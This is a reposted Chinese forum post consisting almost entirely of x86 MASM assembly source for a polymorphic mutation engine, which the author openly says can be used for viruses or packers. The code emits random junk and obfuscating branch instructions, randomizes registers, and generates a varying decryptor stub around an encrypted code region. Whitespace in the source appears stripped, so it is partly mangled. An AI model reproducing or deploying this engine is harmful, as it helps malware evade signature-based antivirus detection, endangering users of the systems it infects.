[转载]一个xxx变形引擎

文章作者: 老丫

可以用于病毒,也可以用于壳

;.386
;.modelflat,stdcall;32bitmemorymodel
;optioncasemap:none;casesensitive

.code
lbl_PolyStart:


;异常指令表
SEHOpCode:
SEHInt1db0CDh,01h;int1
SEHDiv0db33h,0C9h,0F7h,0F1h;xorecx,ecxdivecx

;单字节指令可变动表(2)

OneByteOpCodedb40h,48h;incregxx,decregxx

;单字节指令固定表(4)

OneBytedb0F8h,0FCh,0F5h,0F9h;clc,cld,cmc,stc

;双字节指令可变动表(9)

TwoByteOpCodedw08BC0h;movregxx,regxx
dw033C0h;xorregxx,regxx
dw003C0h;addregxx,regxx
dw02BC0h;subregxx,regxx
dw021C0h;andregxx,regxx
dw085C0h;testregxx,regxx
dw03BC0h;cmpregxx,regxx
dw009C0h;orregxx,regxx
dw011C0h;adcregxx



;双字节固定表(2)

TwoBytedw0D40Ah,0D50Ah;aam,aad


;六字节指令变动表(8)

SixByteOpCodedw0C7C0h,081F0h,081E0h,081C8h;movregxx,xxxxorregxx,xxxandregxx,xxxorregxx,xxx
dw0F7C0h,081F8h,081C0h,081E8h;testregxx,xxxcmpregxx,xxxaddregxx,xxxsubregxx,xxx


;花指令表(9)

RandOpCodedb70h,7Ah,72h,76h,7Eh,78h,7Ch,0EBh,0E8h
;jo,jnojp,jnpjb,jnbja,jnajng,jgjs,jnsjl,jnl,jmp,call

;随机表(5)
RandomTableddoffsetOneByteOpCode,offsetOneByte
ddoffsetTwoByteOpCode,offsetTwoByte
ddoffsetSixByteOpCode

Reg_StartAddressdd0
Reg_Lengthdd0

OP_MOVequ0B8h
OP_XORequ313400h
Randxdd0




pushallmacro
pusheax
pushecx
pushedx
pushebx
pushesi

endm

popallmacro
popesi
popebx
popedx
popecx
popeax
endm




;计算CRC32,Esi为首地址,Edi为长度
;Eax返回CRC32值
CRC32procusesesiediBuf:dword,nLength:dword

pushecx;procedureforcalculatingCRC32s
pushedx;atrun-time
pushebx
movesi,Buf
movedi,nLength
xorecx,ecx
dececx
movedx,ecx
NextByteCRC:
xoreax,eax
xorebx,ebx
lodsb
xoral,cl
movcl,ch
movch,dl
movdl,dh
movdh,8
NextBitCRC:
shrbx,1
rcrax,1
jncNoCRC
xorax,08320h
xorbx,0EDB8h
NoCRC:decdh
jnzNextBitCRC
xorecx,eax
xoredx,ebx
decedi
jneNextByteCRC
notedx
notecx
popebx
moveax,edx
roleax,16
movax,cx
popedx
popecx

ret

CRC32endp

;Eax返回0---dwNumber-1之间的随机数

RandSeeddd0
Randomizeproc
pushad
callPolyStart
PolyStart:
popesi
subesi,offsetPolyStart;重定位
db0fh,31h
addeax,edx
movdwordptrRandSeed[esi],eax
popad
ret

Randomizeendp
RandomprocusesedxecxdwNumber:dword
callPolyStart
PolyStart:
popesi
subesi,offsetPolyStart;重定位
moveax,RandSeed[esi]

movecx,41C64E6Dh
mulecx
addeax,3039h
movRandSeed[esi],eax
xoredx,edx
divdwNumber
xchgeax,edx
ret

Randomendp

RandomRegprocdwNumber:dword
callPolyStart
PolyStart:
popesi
subesi,offsetPolyStart;重定位
Rep8:

pushdwNumber
callRandom
cmpeax,4;保护Esp寄存器
jzRep8
cmpeax,5;保护ebp寄存器(ebp在程序为存取变量)
jzRep8
cmpeax,Reg_StartAddress[esi]
jzRep8
cmpeax,Reg_Length[esi]
jzRep8

ret

RandomRegendp


;1字节可变垃圾指令处理
;Ecx为要产生的垃圾指令的条数

Sub_OneByteOpCodeproc

pushall
push2
callRandom;随机选取指令inc,dec...
leaebx,OneByteOpCode[esi+eax];取得1字节可变垃圾指令的相应地址
movzxedx,byteptr[ebx];取得1字节可变垃圾指令
pushedx
Rep9:
push8
callRandomReg;随机选取寄存器eax,ecx,edx...
cmpeax,Reg_Length[esi]
jzRep9
cmpeax,Reg_StartAddress[esi]
jzRep9
popedx;保护代码起始地址和代码长度已经选取的寄存器
adddl,al
movbyteptr[edi],dl
incedi
popall
ret

Sub_OneByteOpCodeendp

;1字节固定垃圾指令处理

Sub_OneByteproc
pushall
push4
callRandom;随机选取指令aaa,aas,clc...
leaebx,OneByte[esi+eax];取得1字节固定垃圾指令的相应地址
movzxedx,byteptr[ebx];取得1字节固定垃圾指令
movbyteptr[edi],dl
incedi
popall
ret

Sub_OneByteendp


;2字节可变垃圾指令处理

Sub_TwoByteOpCodeproc
pushall
push9
callRandom
leaebx,TwoByteOpCode[esi+eax*2]
movzxedx,wordptr[ebx]
pushedx;usespush
Rep10:
push8
callRandomReg
cmpeax,Reg_Length[esi]
jzRep10
cmpeax,Reg_StartAddress[esi]
jzRep10;保护代码起始地址和代码长度已经选取的寄存器

movebx,eax

Rep11:
push8
callRandomReg
cmpeax,Reg_Length[esi]
jzRep11
cmpeax,Reg_StartAddress[esi]
jzRep11;保护代码起始地址和代码长度已经选取的寄存器
movcl,8;usesecx
mulcl
popedx
adddl,al
adddl,bl
movbyteptr[edi],dh
incedi
movbyteptr[edi],dl
incedi
popall
ret

Sub_TwoByteOpCodeendp

;2字节固定垃圾指令处理

Sub_TwoByteproc
pushall
push2
callRandom
leaebx,TwoByte[esi+eax*2]
movdx,wordptr[ebx]
movbyteptr[edi],dh
incedi
movbyteptr[edi],dl
incedi
popall
ret

Sub_TwoByteendp

;6字节垃圾指令处理

Sub_SixByteOpCodeproc
pushall
push8
callRandom
leaebx,SixByteOpCode[esi+eax*2]
movdx,wordptr[ebx]
pushedx

Rep12:
push8
callRandomReg
cmpeax,Reg_Length[esi]
jzRep12
cmpeax,Reg_StartAddress[esi]
jzRep12;保护代码起始地址和代码长度已经选取的寄存器

popedx
adddl,al
movbyteptr[edi],dh

incedi
movbyteptr[edi],dl
incedi
push600000h
callRandom
movdwordptr[edi],eax
addedi,4
popall

ret

Sub_SixByteOpCodeendp




;产生异常块
GenSEHBlockproc




ret

GenSEHBlockendp


;产生随机的垃圾指令

GenerateRandOpCodeproc
pushall
push10
callRandom;在每条有效指令之间随机的产生0-9条垃圾指令
inceax
movecx,eax;usesecx

Rep13:
pushecx
push5
callRandom;总共有5种类型的垃圾指令，随机取一种
movebx,eax

movedx,RandomTable[esi+ebx*4]
leaedx,[edx+esi];得到垃圾指令表的地址

cmpebx,0
jzlbl_OneByteOpCode;转1字节可变垃圾指令处理

cmpebx,1
jzlbl_OneByte;转1字节固定垃圾指令处理

cmpebx,2
jzlbl_TwoByteOpCode;转2字节可变垃圾指令处理

cmpebx,3
jzlbl_TwoByte;转2字节固定垃圾指令处理

jmplbl_SixByteOpCode;转6字节垃圾指令处理


lbl_OneByteOpCode:
callSub_OneByteOpCode
jmplbl_Next1

lbl_OneByte:
callSub_OneByte
jmplbl_Next1

lbl_TwoByteOpCode:
callSub_TwoByteOpCode
jmplbl_Next1

lbl_TwoByte:
callSub_TwoByte
jmplbl_Next1

lbl_SixByteOpCode:

callSub_SixByteOpCode

lbl_Next1:
popecx
dececx
jnzRep13;继续产生垃圾指令
popall
ret

GenerateRandOpCodeendp


;填充dwLength2长的随机数据到edi->的缓冲区
FillRandomCodeprocdwLength2:dword
pushall
movecx,dwLength2;usesecx

Rep14:
push0FFh
callRandom
movbyteptr[edi],al
incedi
loopRep14
popall
ret

FillRandomCodeendp


;产生随机的花指令

GFIproc
pushall

push9
callRandom
cmpeax,7
jzlbl_Jmp
cmpeax,8
jzlbl_Call
leaebx,RandOpCode[esi+eax]
movzxedx,byteptr[ebx]
movbyteptr[edi],dl
incedi
push5
callRandom
addeax,3;3-7之间
movbyteptr[edi],al
incedi
incdl
movbyteptr[edi],dl
incedi
deceax
deceax
movbyteptr[edi],al
incedi
pusheax
callFillRandomCode
jmplbl_Exit1


lbl_Jmp:
leaebx,RandOpCode[esi+eax]
movzxedx,byteptr[ebx]
movbyteptr[edi],dl;E9h->[edi]
incedi
push4
callRandom
inceax
inceax
movbyteptr[edi],al
incedi
movbyteptr[edi],0E8h
incedi
deceax
pusheax
callFillRandomCode
jmplbl_Exit1

lbl_Call:
leaebx,RandOpCode[esi+eax]
movzxedx,byteptr[ebx]
movbyteptr[edi],dl;E8h->[edi]
incedi
push4
callRandom
inceax
inceax
movdwordptr[edi],eax
addedi,4
movbyteptr[edi],0E9h
deceax
pusheax
callFillRandomCode
incedi
push8
callRandomReg
movedx,58h;popregxx
addedx,eax
movbyteptr[edi],dl
incedi

lbl_Exit1:
popall
ret

GFIendp



;随机产生第1部分代码
G1CodeprocdwLength1:dword,reg:dword
pushall
movebx,dwLength1
push5
callRandom
cmpeax,1
jzlbl_PushPopG1
cmpeax,2
jzlbl_MovXorG1
cmpeax,3
jzlbl_MovNotG1
cmpeax,4
jzlbl_MovRolG1

lbl_MovAddG1:
push0FFFFFFFFh
callRandom
subebx,eax

movedx,0C0C7h;movregxx,xxx
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx;ebx为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0C081h;addregxx,xxx
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],eax;eax为addregxx,xxx里的xxx
addedi,4

jmplbl_Exit2

lbl_PushPopG1:

movbyteptr[edi],68h;pushxxx
incedi
movdwordptr[edi],ebx;ebx为pushxxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,58h;popregxx
addedx,reg
movbyteptr[edi],dl
incedi


jmplbl_Exit2

lbl_MovXorG1:

push0FFFFFFFFh
callRandom
xorebx,eax

movedx,0C0C7h;movregxx,xxx
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx;ebx为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0F081h;xorregxx,xxx
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],eax;eax为addregxx,xxx里的xxx
addedi,4


jmplbl_Exit2

lbl_MovNotG1:

notebx
movedx,0C0C7h;movregxx,xxx
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx;ebx为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0D0F7h;notregxx
movecx,reg
adddh,cl
movwordptr[edi],dx
incedi
incedi

jmplbl_Exit2

lbl_MovRolG1:

push020h
callRandom
movcl,al
pusheax
rorebx,cl

movedx,0C0C7h;movregxx,xxx
moveax,reg
adddh,al
movwordptr[edi],dx
incedi
incedi
movdwordptr[edi],ebx;ebx为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0C0C1h;rolregxx,xxx
moveax,reg
adddh,al
movwordptr[edi],dx
incedi
incedi
popeax
movbyteptr[edi],al;eax为addregxx,xxx里的xxx
incedi


lbl_Exit2:
popall
ret

G1Codeendp


;随机产生第2部分代码
G2Codeprocreg:dword
pushall
push5
callRandom
cmpeax,1
jzlbl_PushPopG2
cmpeax,2
jzlbl_MovXorG2
cmpeax,3
jzlbl_MovNotG2
cmpeax,4
jzlbl_MovRolG2

lbl_MovAddG2:
movG2Selected[esi],0;保存第2部分的产生方式
movedx,0C0C7h;movregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi;保存Movregxx,xxx指令的地址
movdwordptr[edi],0;0为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0C081h;addregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode2[esi],edi;保存addregxx,xxx指令的地址

movdwordptr[edi],0;eax为addregxx,xxx里的xxx
addedi,4

jmplbl_Exit3

lbl_PushPopG2:
movG2Selected[esi],1;保存第2部分的产生方式


movbyteptr[edi],68h;pushxxx
incedi
movAddressOfCode1[esi],edi;保存Pushxxx指令的地址


movdwordptr[edi],0;为pushxxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,58h;popregxx
addedx,reg
movbyteptr[edi],dl
incedi


jmplbl_Exit3

lbl_MovXorG2:
movG2Selected[esi],2;保存第2部分的产生方式

movedx,0C0C7h;movregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi;保存Movregxx,xxx指令的地址

movdwordptr[edi],0;0为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0F081h;xorregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode2[esi],edi;保存xorregxx,xxx指令的地址

movdwordptr[edi],0;eax为xorregxx,xxx里的xxx
addedi,4


jmplbl_Exit3

lbl_MovNotG2:
movG2Selected[esi],3;保存第2部分的产生方式

notebx
movedx,0C0C7h;movregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi
movdwordptr[edi],0;0为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0D0F7h;notregxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi

jmplbl_Exit3

lbl_MovRolG2:
movG2Selected[esi],4;保存第2部分的产生方式


movedx,0C0C7h;movregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode1[esi],edi;保存Movregxx,xxx指令的地址

movdwordptr[edi],0;0为movregxx,xxx里的xxx
addedi,4
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0C0C1h;rolregxx,xxx
movebx,reg
adddh,bl
movwordptr[edi],dx
incedi
incedi
movAddressOfCode2[esi],edi;保存Rolregxx,xxx指令的地址

movbyteptr[edi],0;eax为Rolregxx,cl里的regxx
incedi


lbl_Exit3:
popall
ret

G2Codeendp


;随机产生第3部分代码
G3CodeprocregOfAddr:dword,key:dword
pushall
push8;1234567
callRandom;决定采用的加密方式-->addsubincdecnotrolror...等等
cmpeax,1
jzlbl_AddG3
cmpeax,2
jzlbl_SubG3
cmpeax,3
jzlbl_IncG3
cmpeax,4
jzlbl_DecG3
cmpeax,5
jzlbl_NotG3
;cmpeax,6
;jzlbl_Rol
;cmpeax,7
;jzlbl_Ror

lbl_XorG3:
movEncryptSelected[esi],0;保存加密方式
movedx,3080h;Xorbyteptr[regxx],xxx
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
movedx,key
movbyteptr[edi],dl
incedi

jmplbl_Exit4

lbl_AddG3:

movEncryptSelected[esi],1;保存加密方式
movedx,2880h;Subbyteptr[regxx],xxx
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
movedx,key
movbyteptr[edi],dl
incedi


jmplbl_Exit4

lbl_SubG3:
movEncryptSelected[esi],2;保存加密方式

movedx,0080h;Addbyteptr[regxx],xxx
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi
movedx,key
movbyteptr[edi],dl
incedi

jmplbl_Exit4

lbl_IncG3:

movEncryptSelected[esi],3;保存加密方式
movedx,008FEh;Decbyteptr[regxx]
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi


jmplbl_Exit4

lbl_DecG3:

movEncryptSelected[esi],4;保存加密方式
movedx,000FEh;Incbyteptr[regxx]
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi

jmplbl_Exit4

lbl_NotG3:

movEncryptSelected[esi],5;保存加密方式
movedx,010F6h;Notbyteptr[regxx]
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi

jmplbl_Exit4

lbl_RolG3:

movEncryptSelected[esi],6;保存加密方式
moveax,key
xoredx,edx
movecx,20h
divecx
movcl,dl
movedx,51h;pushecx
movbyteptr[edi],dl
incedi
pushecx
callGFI
popecx
movedx,0C1C6h;movcl,xxx
movwordptr[edi],dx
incedi
incedi
movbyteptr[edi],cl
incedi
callGFI
movedx,008D3h;rordwordptr[edi],cl
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi

jmplbl_Exit4

lbl_RorG3:

movEncryptSelected[esi],7;保存加密方式

moveax,key
xoredx,edx
movecx,20h
divecx
movcl,dl
movedx,51h;pushecx
movbyteptr[edi],dl
incedi
pushecx
callGFI
popecx
movedx,0C1C6h;movcl,xxx
movwordptr[edi],dx
incedi
incedi
movbyteptr[edi],cl
incedi
callGFI
movedx,000D3h;roldwordptr[regxx],cl
movebx,regOfAddr
adddh,bl
movwordptr[edi],dx
incedi
incedi



lbl_Exit4:

popall
ret

G3Codeendp

pGetModuleCodedd0
;随机产生第4部分代码
G4CodeprocregOfLen:dword,regOfAddr:dword,key:dword,EntryPoint:dword
pushall

rep100:
push2
callRandom
cmpeax,0
jzlbl_DecJge
cmpregOfAddr,1
jzrep100
;pushreg00保护首地址寄存器
;movecx,reg11长度寄存器

;Rep:
;Xordwordptr[reg00],key
;increg00
;LoopRep
;popreg00
lbl_Loop:

movedx,50h;pushregxx
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令
movedx,0C88Bh;movecx,regxx
movebx,regOfLen
adddh,bl
movwordptr[edi],dx
incedi
incedi
callGFI
pushedi
popedx
pushedx;保存Loopxxx的循环地址
callGFI
movbyteptr[edi],51h;pushecx
incedi
callGenerateRandOpCode;产生垃圾指令

callGFI;产生花指令

pushkey
pushregOfAddr
callG3Code

callGFI;产生花指令
movedx,40h;incregxx
addedx,regOfAddr
movbyteptr[edi],dl
incedi

callGenerateRandOpCode
movbyteptr[edi],59h;popecx
incedi
callGFI;产生花指令
movedx,0E2h;Loopxxx
movbyteptr[edi],dl
;incedi
incedi
movbyteptr[edi],0
incedi
popedx
subedx,edi
movbyteptr[edi-1],dl
movedx,58h;popregxx
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGFI
;invokeVirtualAlloc,NULL,1000h,MEM_COMMIT,PAGE_EXECUTE_READWRITE
;oreax,eax
;jzlbl_Exit5
;movpGetModuleCode,eax
callGenerateRandOpCode
callGFI

;pushEn_ImageBase
;pushNewRva
;pushedi
;callGenerateGetModule

;movbyteptr[edi],68h;PushEntryPoint
;incedi
;movedx,EntryPoint
;movdwordptr[edi],edx
;addedi,4
;callGenerateRandOpCode
;callGFI
;movbyteptr[edi],0C3h;Ret
;incedi
jmplbl_Exit5


lbl_DecJge:

movedx,50h;pushregxx
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode;产生垃圾指令
callGFI;产生花指令

callGFI;产生花指令

pushedi
popedx
pushedx;保存Jgexxx的循环地址

callGFI;产生花指令

pushkey
pushregOfAddr
callG3Code;产生解密代码,如Xor,sub,not...等等

callGFI;产生花指令
movedx,40h;incregxx
addedx,regOfAddr
movbyteptr[edi],dl
incedi

callGFI;产生花指令

movedx,48h;Decregxx
addedx,regOfLen
movbyteptr[edi],dl
incedi
callGFI

movedx,07fh;Jgexxx
movbyteptr[edi],dl
incedi
movbyteptr[edi],0
incedi
popedx;恢复Jgexxx的xxx
subedx,edi
movbyteptr[edi-1],dl
callGenerateRandOpCode
callGFI

;pushEn_ImageBase
;pushNewRva
;pushedi
;callGenerateGetModule



callGenerateRandOpCode
callGFI
movedx,58h;popregxx
addedx,regOfAddr
movbyteptr[edi],dl
incedi
callGenerateRandOpCode
callGFI
;movbyteptr[edi],0FFh
;incedi
;movedx,0E0h
;addedx,regOfAddr
;movbyteptr[edi],dl;Jmpregxx
;incedi
;callGenerateRandOpCode
;callGFI

;movbyteptr[edi],68h;PushEntryPoint
;incedi
;movedx,EntryPoint
;movdwordptr[edi],edx
;addedi,4
;callGenerateRandOpCode
;callGFI
;movbyteptr[edi],0C3h;Ret
;incedi




lbl_Exit5:
popall
ret

G4Codeendp



;整个程序的核心(变形引擎)
;假设解密代码如下：(可分为4部分)
;movreg00,SizeOfCode1
;movreg11,EntryPointOfCode2
;Rep:
;xordowrdptr[reg00+reg11],key3
;decreg004
;jnzRep
;为了增强变形引擎的强度可以把上面的代码分解(或叫变换)
;如下：
;第1部分代码可以有下面5种选择
;movreg00,SizeOfCode--->movreg00,xxxaddreg00,xxx0(其中reg00为随机选取的寄存器)
;pushxxxpopreg001
;movreg00,xxxxorreg00,xxx2
;movreg00,xxxnotreg003
;movreg00,xxxrolreg00,xx4
;

;第2部分同样有5种选择
;movreg11,EntryPointOfCode也可作同样处理


;第3部分有8种选择
;0
;同理xordwordptr[reg00+reg11],key也可变换如下：

;1234567
;-->addsubincdecnotrolror...等等
;

;第4部分有2种选择
;01
;decreg00--->Loopxxx
;jnzxxx



;paramBuf存放变形以后代码的缓冲区
;paramStartAddress欲加密代码的首地址
;paramdwLength欲加密代码的长度
;

EncryptSelecteddd0;保存被选择的加密方式
G2Selecteddd0;保存第2部分产生的方式
AddressOfCode1dd0;相应的地址
AddressOfCode2dd0
keydd0

PolyEngineprocBuf:dword,StartAddress:dword,dwLength:dword,VA:dword,EntryPoint:dword
callPolyStart
PolyStart:
popesi
subesi,offsetPolyStart;重定位
callRandomize;初始化随机种子
push8
callRandomReg
movdwordptrReg_Length[esi],eax;决定代码长度使用的寄存器
Rep0:
push8
callRandomReg
cmpeax,Reg_Length[esi]
jzRep0
movdwordptrReg_StartAddress[esi],eax;决定代码起始地址使用的寄存器
movedi,Buf
pushesi
callGenerateRandOpCode;产生0-9条随机的垃圾指令
popesi
callGFI;产生花指令
pushesi
pushReg_Length[esi]
pushdwLength

callG1Code
popesi;产生第1部分代码
callGenerateRandOpCode;产生0-9条随机的垃圾指令
callGFI;产生花指令
pushesi
pushReg_StartAddress[esi]
callG2Code
popesi
pushesi
push0FFh
callRandom;取得一个随机的Key
popesi
movkey[esi],eax
pushesi
pushEntryPoint;原程序入口点
pushkey[esi]
pushReg_StartAddress[esi]
pushReg_Length[esi]

callG4Code
popesi
moveax,G2Selected[esi]
pushedi;把Edi保护起来
pushecx
;movreg00,SizeOfCode--->movreg00,xxxaddreg00,xxx0(其中reg00为随机选取的寄存器)
;pushxxxpopreg001
;movreg00,xxxxorreg00,xxx2
;movreg00,xxxnotreg003
;movreg00,xxxrolreg00,xx4
;
.ifVA!=0
movedi,VA
.endif

.ifeax==0
push0FFFFFFFFh
callRandom
subedi,eax
movebx,AddressOfCode1[esi]
mov[ebx],edi
movebx,AddressOfCode2[esi]
mov[ebx],eax

.elseifeax==1
movebx,AddressOfCode1[esi]
mov[ebx],edi
.elseifeax==2
push0FFFFFFFFh
callRandom
xoredi,eax
movebx,AddressOfCode1[esi]
mov[ebx],edi
movebx,AddressOfCode2[esi]
mov[ebx],eax


.elseifeax==3
notedi
movebx,AddressOfCode1[esi]
mov[ebx],edi

.else
push020h
callRandom
movcl,al
roredi,cl
movebx,AddressOfCode1[esi]
mov[ebx],edi
movebx,AddressOfCode2[esi]
movbyteptr[ebx],cl
.endif
popecx
popedi


;同理xordwordptr[reg00+reg11],key也可变换如下：

;1234567
;-->addsubincdecnotrolror...等等

moveax,EncryptSelected[esi]

movecx,dwLength;需加密代码的长度
.ifVA==0
pushad
movesi,StartAddress
cld
repmovsb

popad
.else
movedi,StartAddress;需加密代码的起始地址

.endif
movedx,key[esi]

.ifeax==0;xor
Rep1:
xorbyteptr[edi],dl
incedi
loopRep1
.elseifeax==1;add
Rep2:
addbyteptr[edi],dl
incedi
loopRep2

.elseifeax==2;sub
Rep3:
subbyteptr[edi],dl
incedi
loopRep3


.elseifeax==3;inc
Rep4:
incbyteptr[edi]
incedi
loopRep4


.elseifeax==4;dec
Rep5:
decbyteptr[edi]
incedi
loopRep5


.elseifeax==5;not
Rep6:
movbl,byteptr[edi]
notbl
movbyteptr[edi],bl
incedi
loopRep6


;.elseifeax==6;rol
Rep7:
;roldwordptr[edi],edx
;incedi
;loopRep7


;.else;ror

Rep20:
;rordwordptr[edi],edx
;incedi
;loopRep20

.endif

moveax,edi
;popad

ret

PolyEngineendp
RealSizeequ$-offsetlbl_PolyStart

SizeOfCodeequ((($-offsetlbl_PolyStart)*10)/1000h+1)*1000h
;end